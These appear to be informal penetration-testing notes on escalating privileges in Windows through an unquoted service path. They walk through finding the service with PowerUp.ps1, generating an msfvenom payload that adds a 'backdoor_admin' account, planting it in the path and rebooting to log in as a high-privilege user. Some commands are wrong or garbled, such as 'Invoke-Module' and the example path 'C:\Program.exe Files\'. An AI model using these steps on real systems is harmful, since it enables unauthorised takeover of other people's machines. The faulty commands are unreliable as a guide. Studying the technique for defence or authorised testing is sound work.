Unquoted Service Path
// click on start Button --> serach for services --> open the application.
// here all the running services are listed --> find your vulnerable service.
// Double Click The Service and Examine the Path :
C:\some path\some path2\vulnservice.exe
here note the space btw the folders --> "some path" this is a single folder but the bloody space made it vulnerable
now we can use it in unintended way.
but if any part of the path is writable by us....
to identify :
use https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
or do it mannually.
Now to run this transfer this to windows and open powershell ;
>>> Invoke-Module .\PowerUp.ps1
>>> Invoke-AllChecks # but if we want only want to check for unquoted path run --> Get-UnquotedService
Now notice the unquoted service path.
Go To Kali :
>>> msfvenom -p windows/adduser USER=backdoor_admin PASS=helloguys! -f exe > service.exe
now transfer this payload to windows and place it as we disscussed above .
E.G. C:\Program Files\ --> C:\Program.exe Files\
Note : Don't forget to rename your payload as per your path.
now go to services (from start button ) and restart the service again ....don't worry if you don't have permission to do it ....so go and reboot the machine so it will be executed automatically
after restarting / rebooting :
open cmd :
>>> net user
<you will have your user created>
so just logout and login again with new user(high privs)
note : while login may be you need to specify your username : Win10-1\<username>
Last updated